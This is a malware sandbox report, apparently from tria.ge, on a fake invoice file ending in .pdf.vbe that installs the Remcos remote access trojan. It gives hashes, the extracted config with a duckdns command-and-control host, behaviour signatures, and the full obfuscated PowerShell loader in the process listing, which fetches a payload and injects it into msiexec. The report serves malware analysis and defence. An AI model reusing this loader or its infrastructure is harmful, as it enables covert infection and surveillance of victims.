Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Faktura_82...df.vbe

windows7-x64

10

Faktura_82...df.vbe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/09/2024, 10:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Faktura_82666410_1361590461·pdf.vbe

  • Size

    74KB

  • MD5

    f1a0355012d13febdfb56ee8d2b38012

  • SHA1

    38fb764e45b496b63b7a49713fac2b411cfc524b

  • SHA256

    670cb64bd0bbb0baf70d835715afa71ab16e20b3b409e66a2fd5fedfdb375f2b

  • SHA512

    5b2b82e2b7fef9f2d1725ee2a13a98c415880abb41e5c7c7d3fedaed67b7b3decc616f5f12ae9231859f01ca56b31fcf16d0da4b90904a740ad8ba8a882b27fa

  • SSDEEP

    1536:spE42QeC4Ud8kA8fEXzY+gRj+u6/GgRIHSHMy+eQ74Zf:sprLeyAsEtu6uKAO5f

Score
10/10
remcosremotehostdiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_82666410_1361590461·pdf.vbe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:432
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3060
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:3668

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    448feb9953546711823c3234485d5a44

    SHA1

    0cb7437d750704872375c98dcc94cf439741d7dc

    SHA256

    9b6260e910803f27a0937fb3bcf90a3377ecddeb6f36d5760819a24bb50399c8

    SHA512

    acc631cddb6caf55124a893f636608bea4e9004f51851a453c85dba1bbeabbe92648796377252140eca994c21e2a5c8a058cfbd3e4e0e233be2ccde8d05b6d31

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1i5yllu.hd4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Kanalseparationen.Gte
    Filesize

    404KB

    MD5

    79bd3fbef131ecc854054049edcff107

    SHA1

    e9ed9087470ed08fb205afd7a16418877e58889b

    SHA256

    23fd943f1b414c05e01dc52336058af7fbb24ccd5ad727cb5489a1f6573fc229

    SHA512

    6f9252026339711bd298f0d9e4b4aa0bca02072c0b4b8f8ca5e8f46299a051bacba15bc2470abe47022a927879b633d41b5be995cce9265a33b5173461f3426b

    Download Submit

  • memory/432-16-0x00007FFCC7730000-0x00007FFCC81F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/432-14-0x00007FFCC7733000-0x00007FFCC7735000-memory.dmp

    Filesize

    8KB

    Download

  • memory/432-0-0x00007FFCC7733000-0x00007FFCC7735000-memory.dmp

    Filesize

    8KB

    Download

  • memory/432-17-0x00007FFCC7730000-0x00007FFCC81F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/432-18-0x00007FFCC7730000-0x00007FFCC81F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/432-21-0x00007FFCC7730000-0x00007FFCC81F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/432-12-0x00007FFCC7730000-0x00007FFCC81F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/432-11-0x00007FFCC7730000-0x00007FFCC81F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/432-6-0x00000257C8F10000-0x00000257C8F32000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3060-26-0x0000000005C30000-0x0000000005C96000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3060-41-0x0000000007440000-0x000000000745A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3060-36-0x0000000005E60000-0x00000000061B4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3060-24-0x0000000005A50000-0x0000000005A72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3060-38-0x0000000006300000-0x000000000631E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3060-39-0x0000000006330000-0x000000000637C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3060-40-0x0000000007A90000-0x000000000810A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3060-25-0x0000000005B10000-0x0000000005B76000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3060-42-0x0000000007540000-0x00000000075D6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3060-43-0x00000000074F0000-0x0000000007512000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3060-44-0x00000000086C0000-0x0000000008C64000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3060-23-0x0000000005420000-0x0000000005A48000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3060-46-0x0000000008C70000-0x0000000009862000-memory.dmp

    Filesize

    11.9MB

    Download

  • memory/3060-22-0x0000000004D10000-0x0000000004D46000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3668-61-0x0000000000F30000-0x0000000002184000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3668-57-0x0000000000F30000-0x0000000002184000-memory.dmp

    Filesize

    18.3MB

    Download